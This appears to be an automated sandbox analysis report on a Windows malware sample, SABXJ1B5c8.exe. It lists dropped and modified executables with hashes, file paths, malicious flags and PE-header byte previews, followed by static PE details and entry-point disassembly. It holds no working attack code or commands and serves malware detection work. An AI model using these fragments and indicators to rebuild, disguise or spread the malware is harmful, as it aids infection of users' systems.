                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:gTRCl8ta/k/uMclF6vMclFq5zHKz8gYbOCzE5Zm3n+SkSJkJIOcuCjHu9+GksCjr:bl80kqF69Fq5zHb6CzE5Z2+fqjFfn
                                                                                                                                                        MD5:A1573254ED08E11ABE9843DCA464FBE1
                                                                                                                                                        SHA1:ABE5BCAF2B3C0E6C327FADCBE59E3C8FEFF0624B
                                                                                                                                                        SHA-256:81927D0B1C960F83A944C18DDF0DADF7ADBC50A1683F3BA586E9C42EC563A754
                                                                                                                                                        SHA-512:2159D9ACE36CDD45971F32801E04A656A671EAB2FA372FDB18216B190E0146B3FF3E8C8966882D2C84276C6EC09010C345D50589805A728FF433B6F8665954E2
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:.@..X...X.......................................X...!...............................x....W.b.............@......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...............................................................|...........I...c..........M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.............P.P.....x....W.b............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1667072
                                                                                                                                                        Entropy (8bit):4.823167753459369
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:2AL3UTG/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:2AL3USLNiXicJFFRGNzj3
                                                                                                                                                        MD5:E745AF96DAB2A5AB6546745352847398
                                                                                                                                                        SHA1:E352B0E8EF607966C42B2C5E933B7A89EE491591
                                                                                                                                                        SHA-256:6FF42F2F121FBAA6DBA2801816BE637FBEDA30DA6E7E452CB8FE9868AE25EB1A
                                                                                                                                                        SHA-512:F0ED461F2FBC135B6F767CE0D63C05DDB73CB0028673FB156C97E7028CAEB80DB0350ECB8CDBB85F89DE75521A43D7188C4F536EB59B14B6D75B8104E9282077
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D|.%...%...%...C...%...C...%...C..{%..*...%...{...%...{...%...{...%...]...%../L...%...%..6$..&{...%..&{.%...%...%..&{...%..Rich.%..................PE..d.....q^.........."..........:.......i.........@..............................%.....U..... ......................................................... ..x.......T*...................P..p...........................`Q..................8............................text............................... ..`.rdata..............................@..@.data....I..........................@....pdata..T*.......,..................@..@.rsrc...x.... ......................@..@.reloc...`...0......................@...........................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1391616
                                                                                                                                                        Entropy (8bit):4.703265819692232
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:FOf/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:FOfLNiXicJFFRGNzj3
                                                                                                                                                        MD5:3D61E604A56C70F50B3C6D3E307619E6
                                                                                                                                                        SHA1:5D213DEBC026BF08E96A6D19B10B63CE551C9BFD
                                                                                                                                                        SHA-256:393611C7351F75C7FD7E26BF4509DB0DA561A098FE542ED2DA7267EF0B517EA3
                                                                                                                                                        SHA-512:081A373369FA53AFDAD2191D03432F84C1FD5430AB40AE904C1CF52868D2B14C8CDCCD2A875F6476B1055326BAFFB0EC1B62A481A7E1751AA5DFC5F491013CB6
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@A...A...A...H.......U...K...U...B...A.....U...F...U...N...U...e...U.t.@...U.v.@...U...@...RichA...................PE..d...6............".................0..........@............................. .....d..... .......... ......................................Xq..........x............................S..T...................(*..(....)..............P*...............................text...@........................... ..`.rdata...n... ...p..................@..@.data...............................@....pdata..............................@..@.rsrc...x...........................@..@.reloc...`..........................@...........................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1513984
                                                                                                                                                        Entropy (8bit):7.094178961981104
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:93frCoQ9tLsiLPLe24CxruW4bIhllG/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:93fIsIPLkCNuVbIhDGLNiXicJFFRGNzb
                                                                                                                                                        MD5:2CF1D6E1616307AEDA96012675BD6E59
                                                                                                                                                        SHA1:9E068D361E6F419099EE20DA043BCC775DB028A0
                                                                                                                                                        SHA-256:45D6F6502FCD4F7735486863E0D6B76D797FBF5A83562E98B27ABD51EBE2EEA3
                                                                                                                                                        SHA-512:FA14B0B2DEFD771D9D507412C365F164C6636BBDF9A9F9DA1A2D385E1AEA5B9FC44B01F7523AC541F633C78741FB33133F3D8AE829ABA8F8A9A81E70C5918AA8
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................z............................................l............Rich............PE..d.................".................0..........@..................................... .... .................................................HL..........(...........................P...T...................P...(... ........................<.......................text...9........................... ..`.rdata..............................@..@.data....:...........p..............@....pdata..............................@..@.didat.......p......................@....rsrc...(............ ..............@..@.reloc...............*..............@...................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1846784
                                                                                                                                                        Entropy (8bit):6.932719967451282
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:dF2YuHNETovAvNYf8kmgLNiXicJFFRGNzj3:o6BCf8kf7wRGpj3
                                                                                                                                                        MD5:D30BDBDB141F003C278042E5C6B4C4D9
                                                                                                                                                        SHA1:E4ED7E5D7F69E0C27A2AF0C6DC7F76F964630056
                                                                                                                                                        SHA-256:DFA26A80BB58F36FD46EA43F5C551E1A5B242C4FBF05966C180BEA5DCBFC623C
                                                                                                                                                        SHA-512:D77E97BB1F4445C05BA5971BFD6CB8191261D16B2D657204F2D6C7DBB91D4B21555938D256194E835C87E2F5982FD3C3772290B2A0BB0E3AE2243CF2957024A1
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W`............yA.K...j...........j.....j.....j.....j.0...j-.....j....Rich...........................PE..d................."......"...(......@..........@.............................p.......-.... .......... .......................................~..H....`..`........................... t..T...........................0w..............Hx..p............................text....!.......".................. ..`.rdata..P^...@...`...&..............@..@.data...............................@....pdata..............................@..@.rsrc...`....`.......6..............@..@.reloc.......p.......>..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):1455616
                                                                                                                                                        Entropy (8bit):7.230980541176181
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:IiW6ZvAKF5i/dN9Bde9j9Trk+Ff/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:IYxF50b9Bdu9TxxLNiXicJFFRGNzj3
                                                                                                                                                        MD5:CFCF2F71DD62614EBD8740921100766F
                                                                                                                                                        SHA1:D67042AB93D53FE505B092CCA0F23057B7C36CC9
                                                                                                                                                        SHA-256:F1A5EF5BDFFB68DA1EE3C1EFE43CA35DD5CE2FDBCBA3EF2554904141FC099397
                                                                                                                                                        SHA-512:9EB88CA1289702F8F5720752C4565613038A712889BDD814573F9D4174901732D1013EE1AEC84690CCD4D133B907FE031693D3ACCFD0A48EA75E611EC9A85079
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zq..>...>...>...7h..D...*{..4...*{..=...>...+...*{..9...*{..V...*{......*{n.?...*{l.?...*{..?...Rich>...........PE..d...)ew..........."................. ~.........@....................................s@.... .......... .................................................. .......@k...................l..T...................@...(...p...............h................................text............................... ..`.rdata.............................@..@.data....8.......*..................@....pdata..@k.......l..................@..@.didat..8....p.......>..............@....rsrc... ............@..............@..@.reloc...............F..............@...........................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1611264
                                                                                                                                                        Entropy (8bit):5.04885701228343
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:aJnJ5D3WXL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:aJnJ5DGXLLNiXicJFFRGNzj3
                                                                                                                                                        MD5:B7E7D630B8756D5CBF242AABEB71EFD2
                                                                                                                                                        SHA1:D2E5CD1D0C3D9FECBEFDD72B3BD7C5CACF86769A
                                                                                                                                                        SHA-256:18E9BE99E74BD2C2B6CBEB28DD700EF323101687E3383A89523A4951ED265E15
                                                                                                                                                        SHA-512:4C763B534B4744882BB6DB4E4798DFE5E8E74D3F9BF318C9EF51090C9C0EB031D02400135140744822A8CDFF57A7C3A19DB07ABE3534667F763EC26EF2323E19
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w............nP.....}.....}........Z...}.....}.....}.....}<....}.....Rich............................PE..d................."............................@..............................#......\.... .......... ..........................................H...............p....................p..T...................h:..(...P9...............:..@... ...@....................text...|........................... ..`.rdata.......0......................@..@.data...............................@....pdata..p...........................@..@.didat..............................@....rsrc...............................@..@.reloc...`...0......................@...................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2075136
                                                                                                                                                        Entropy (8bit):6.72987139168967
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:6PK8mJYTerDjfJ2313e1mP1MdnUELNiXicJFFRGNzj3:X7wRGpj3
                                                                                                                                                        MD5:F79AF1CAC713845A99AA43F125D01408
                                                                                                                                                        SHA1:8AE789AF2427987F5063E656CF12A61FFFAD550B
                                                                                                                                                        SHA-256:B24B42C7EEFC59596CD8DEFE5BC183F44B33EF304A12683B0F91DB065805B60E
                                                                                                                                                        SHA-512:8D627F51C79B6A6BD498894E119DAF96D451102AA2C8D7325E78B2FA2E3C98034077E8CD3724E7A5FA46B3DAC7F60731A5F5E99884E5EDE5C2458198F41D32B6
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.e.!.6.!.6.!.6.YI6.!.6.J.7.!.6.J.7.!.6.!.6. .6.J.7.!.6.J.7.!.6.J.7.!.6.J%6.!.6.J.7.!.6Rich.!.6........PE..d...b.Xw.........."......v...f.......p.........@.............................. ...... ... .......... ..................................................@O...0..lx...................o..T............................................................................text....t.......v.................. ..`.rdata..`|.......~...z..............@..@.data...............................@....pdata..lx...0...z..................@..@.didat..P............x..............@....rsrc...@O.......P...z..............@..@.reloc..............................@...................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1381376
                                                                                                                                                        Entropy (8bit):4.682169613566158
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:XnW/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:XnWLNiXicJFFRGNzj3
                                                                                                                                                        MD5:135921C8C6E6F42106E2AC61EE0D0612
                                                                                                                                                        SHA1:2792AB8CEB92FEE6FCC37C980814F7ED41B67E31
                                                                                                                                                        SHA-256:7B5D4AC341C84389787064A349067ABFC512CD69A8ADC7A75CF054F1A9B2BC4A
                                                                                                                                                        SHA-512:8AEADE98D2B97613D95B2B8367955D979F01CABD32DAAAE2D637DE9B84D8D3F0E4452982EC8165D692F5F93ECFA95AEAFD27F40E4A3B8CAFF62086E72AF2E97D
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.............................. .....i..... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...`...........t..............@...................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1434112
                                                                                                                                                        Entropy (8bit):4.680810738770034
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:1Iyh/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:1ICLNiXicJFFRGNzj3
                                                                                                                                                        MD5:077870CDAFB7A6CEE9112FA39CCF50BF
                                                                                                                                                        SHA1:121DB996FB8C36FC59B6C75F03D46E9B5C77D9C3
                                                                                                                                                        SHA-256:E976DA0F61C915E10AF7999BB3B5AF0A94E8070D602D3F7B9F7D7D41D14E7AFC
                                                                                                                                                        SHA-512:4D756B7850BCA2C3688353D60F498B7DD0FE0B07296B819670452D2F4940D895E82B0A4A6E190FB799C69EF1EDF955344E7D4768E3573B3F79627551E6E8B984
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@..............................!......'.... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...`...........B..............@...................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1355264
                                                                                                                                                        Entropy (8bit):4.598904922557277
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:34KviJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:rb/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:A96C756C6C48FBB614BE0870325F22DC
                                                                                                                                                        SHA1:5CA58624B4B355F23E1CD2BFDDADAE6EEE1F8B3F
                                                                                                                                                        SHA-256:01592A534DF33E01F51423CEC463C385D7A37189B709A2A848AD387B107E478F
                                                                                                                                                        SHA-512:3DEE0AF6801B8729DF5315E8D825A879E6E34401505593ED67DB2BAD19167C28436E33632187717211BD827B6512687015B8C90BBAD0A841E012460423E8B0AE
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................8..............................Rich............PE..d................"...........................@.....................................V.... .......... ......................................8........@....... ..........................T.............................................. .......@....................text...!........................... ..`.rdata..:7.......8..................@..@.data....$..........................@....pdata....... ......................@..@.didat.......0......................@....rsrc........@... ..................@..@.reloc...`...`......................@...........................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1302528
                                                                                                                                                        Entropy (8bit):4.527045579291061
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:ey7iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Hv/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:5444F05919224257A311E1B66F090E3A
                                                                                                                                                        SHA1:971D6435D61E588869B1D34FCC3A3C732B80494A
                                                                                                                                                        SHA-256:5F4F1188CF1CE96DCD48A1720897967506ED70C34B46D7B4505D4F25C5D9DD9F
                                                                                                                                                        SHA-512:C590C526A4C5E0DCBE4C7EEA9CB242B910F74E13AE9369933238653F9CC32C6637FB535119FC6530B1C9275B1C0424BF334E937C7BB334B09C3F2111ADC7A607
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^m.^?..^?..^?..JT.._?..JT..\?..JT..M?..JT..W?..^?...?..JT..\?..JT.._?..JT.._?..Rich^?..................PE..d....Ou..........."...... ...&......`'.........@.....................................i.... .......... ......................................l8..d....`.......P..,...................p4..T............................0..............(1..X............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..,....P.......6..............@..@.rsrc........`.......8..............@..@.reloc...`...p.......@..............@...........................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1303552
                                                                                                                                                        Entropy (8bit):7.16074711726084
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:3Z0FxT1UoYr99GdcJKn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:JwWsnLNiXicJFFRGNzj3
                                                                                                                                                        MD5:4F54A0CCDE62E37349E5E85A31E34B3B
                                                                                                                                                        SHA1:4AF6D93A55631341E2AA6664F8A1DEFD0B74C117
                                                                                                                                                        SHA-256:7F3E257B9D08188F874900126F8A204B334C57E339C661F0B2A71C2C248C3504
                                                                                                                                                        SHA-512:6D13C809FBFF6F87A207ED942EC0BACBCFA24FE4AA6B0BAD0F70120E9D5B26107A1FE5FD8B080F913E8A0B144665DB7F3443E937035574ADADF0F6060411B976
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0..c..c..c..uc...c...b..c...b..c...b..c...b..c..cR..c...b...c...b..c...c..c...b..cRich..c................PE..d................."..........6......@..........@.............................@......LA.... .......... ..................................8#......H....@...........,...................s..T...........................` ..............x!.......{.......................text............................... ..`.rdata..............................@..@.data...............................@....pdata...,..........................@..@.didat.......0......................@....rsrc........@......................@..@.reloc.......P......................@...................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1495040
                                                                                                                                                        Entropy (8bit):4.819223903721424
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:ByocDApQ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:socDApQLNiXicJFFRGNzj3
                                                                                                                                                        MD5:FCB4D291BCB53746D997CF574DCE2C7A
                                                                                                                                                        SHA1:C988CAF16CE0344DE0E5158E2423E6C9E3B66DB4
                                                                                                                                                        SHA-256:4D2A716887EA4FEB904AA1FF1A68E2679D505366397DB211D3116DCD80BA814B
                                                                                                                                                        SHA-512:29409B9AB1C8EBD1A031BD53F62D33E91E2644B109929E151BFC6B2BB4763376F79DDEE5EC8BD445C47F024D5AEBEBB455C210DB53133C2BB67526823B4156DA
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........N]...]...]...T...k...I..^...I..J...]...T...I..Z...I..W...I..h...I..\...I.n.\...I..\...Rich]...........................PE..d...&Gf..........."..........Z......0..........@..............................!.....H..... .......... ..............................0....%......0....`.. ....0.......................B..T...................h...(...P.......................$........................text...?........................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ..................@..@.didat..(....P.......$..............@....rsrc... ....`.......&..............@..@.reloc...`...p.......0..............@...........................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2164736
                                                                                                                                                        Entropy (8bit):7.056787870090176
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:fWcnPqQUGpuphwC0DNLDpaRFXrLuWGMK8IKkLNiXicJFFRGNzj3:H0zuNIG7wRGpj3
                                                                                                                                                        MD5:121726021DB13232851EB2ED69D08172
                                                                                                                                                        SHA1:4CDF1B16B340FA6496E55B5215C3D26E3FDBE46A
                                                                                                                                                        SHA-256:4D2D00E86BBE379A17C04AADBAB7E5C2E3A808DCB783651FEF71E2653C4310DC
                                                                                                                                                        SHA-512:F05EB73472DC034AD16A6DEE2D4FD2B82CEFB50BC8A6FDD4970F7FE638CD0EDC947873123D6A7E53F987D668E1709D6F09A585AC87F0305DAFD5FAA53E93B398
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............M...M...M..L...M..L...M..L...M..L...M...My..M..L4..M..L...M..pM...M..L...MRich...M........PE..d....c..........."..........`...... ..........@.............................`!.......!... .......... ...............................z......h...|....`...........w..................p...T...................x...(...`................................................text............................... ..`.rdata..............................@..@.data....%..........................@....pdata...w.......x..................@..@.rsrc........`......................@..@.reloc.......p.......(..............@...........................................................................................................................................................................................................................................................................
                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Entropy (8bit):7.400115515639356
                                                                                                                                                        TrID:
                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                        File name:SABXJ1B5c8.exe
                                                                                                                                                        File size:1'566'208 bytes
                                                                                                                                                        MD5:5742ab086dc8f6e149625cb4af899678
                                                                                                                                                        SHA1:89680c76c0e33ac54a1932df4bfb7aa3e2ee0746
                                                                                                                                                        SHA256:dff12e1840c3265f14378662e2dbd2e1cad4aa31027ff29056a42964adda27c6
                                                                                                                                                        SHA512:7529867878a1412f17582130e030c0da9d7450d3ba80271a2a714154f1f872f3bb154957efdac0dae60d4a9306737b7c62913fc49186772e2a4b8dc9dc6d9e16
                                                                                                                                                        SSDEEP:24576:2u6J3EO0c+JY5UZ+XC0kGso6FaSrEmPWYy/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Yp0c++OCvkGs9FaSrIYyLNiXicJFFRGN
                                                                                                                                                        TLSH:1C75D02273DDC360CB769173BF29B7016EBB7C654630B8572F881D7DA960262162C7A3
                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                                                                                                        Icon Hash:aaf3e3e3938382a0
                                                                                                                                                        Entrypoint:0x427dcd
                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                        Digitally signed:false
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                        Time Stamp:0x675A488A [Thu Dec 12 02:20:58 2024 UTC]
                                                                                                                                                        TLS Callbacks:
                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                        OS Version Major:5
                                                                                                                                                        OS Version Minor:1
                                                                                                                                                        File Version Major:5
                                                                                                                                                        File Version Minor:1
                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                        Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                                                                                        Instruction
                                                                                                                                                        call 00007F39292C91AAh
                                                                                                                                                        jmp 00007F39292BBF74h
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        push edi
                                                                                                                                                        push esi
                                                                                                                                                        mov esi, dword ptr [esp+10h]
                                                                                                                                                        mov ecx, dword ptr [esp+14h]
                                                                                                                                                        mov edi, dword ptr [esp+0Ch]
                                                                                                                                                        mov eax, ecx
                                                                                                                                                        mov edx, ecx
                                                                                                                                                        add eax, esi
                                                                                                                                                        cmp edi, esi
                                                                                                                                                        jbe 00007F39292BC0FAh
                                                                                                                                                        cmp edi, eax
                                                                                                                                                        jc 00007F39292BC45Eh
                                                                                                                                                        bt dword ptr [004C31FCh], 01h
                                                                                                                                                        jnc 00007F39292BC0F9h
                                                                                                                                                        rep movsb
                                                                                                                                                        jmp 00007F39292BC40Ch
                                                                                                                                                        cmp ecx, 00000080h
                                                                                                                                                        jc 00007F39292BC2C4h
                                                                                                                                                        mov eax, edi
                                                                                                                                                        xor eax, esi
                                                                                                                                                        test eax, 0000000Fh
                                                                                                                                                        jne 00007F39292BC100h
                                                                                                                                                        bt dword ptr [004BE324h], 01h
                                                                                                                                                        jc 00007F39292BC5D0h
                                                                                                                                                        bt dword ptr [004C31FCh], 00000000h
                                                                                                                                                        jnc 00007F39292BC29Dh
                                                                                                                                                        test edi, 00000003h
                                                                                                                                                        jne 00007F39292BC2AEh
                                                                                                                                                        test esi, 00000003h
                                                                                                                                                        jne 00007F39292BC28Dh
                                                                                                                                                        bt edi, 02h
                                                                                                                                                        jnc 00007F39292BC0FFh
                                                                                                                                                        mov eax, dword ptr [esi]
                                                                                                                                                        sub ecx, 04h
                                                                                                                                                        lea esi, dword ptr [esi+04h]
                                                                                                                                                        mov dword ptr [edi], eax
                                                                                                                                                        lea edi, dword ptr [edi+04h]
                                                                                                                                                        bt edi, 03h
                                                                                                                                                        jnc 00007F39292BC103h
                                                                                                                                                        movq xmm1, qword ptr [esi]
                                                                                                                                                        sub ecx, 08h
                                                                                                                                                        lea esi, dword ptr [esi+08h]
                                                                                                                                                        movq qword ptr [edi], xmm1
                                                                                                                                                        lea edi, dword ptr [edi+08h]
                                                                                                                                                        test esi, 00000007h
                                                                                                                                                        je 00007F39292BC155h
                                                                                                                                                        bt esi, 03h
                                                                                                                                                        jnc 00007F39292BC1A8h
                                                                                                                                                        Programming Language:
                                                                                                                                                        • [ASM] VS2013 build 21005
                                                                                                                                                        • [ C ] VS2013 build 21005
                                                                                                                                                        • [C++] VS2013 build 21005
                                                                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                                                                        • [ASM] VS2013 UPD4 build 31101
                                                                                                                                                        • [RES] VS2013 build 21005
                                                                                                                                                        • [LNK] VS2013 UPD4 build 31101
                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x27f70.rsrc
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
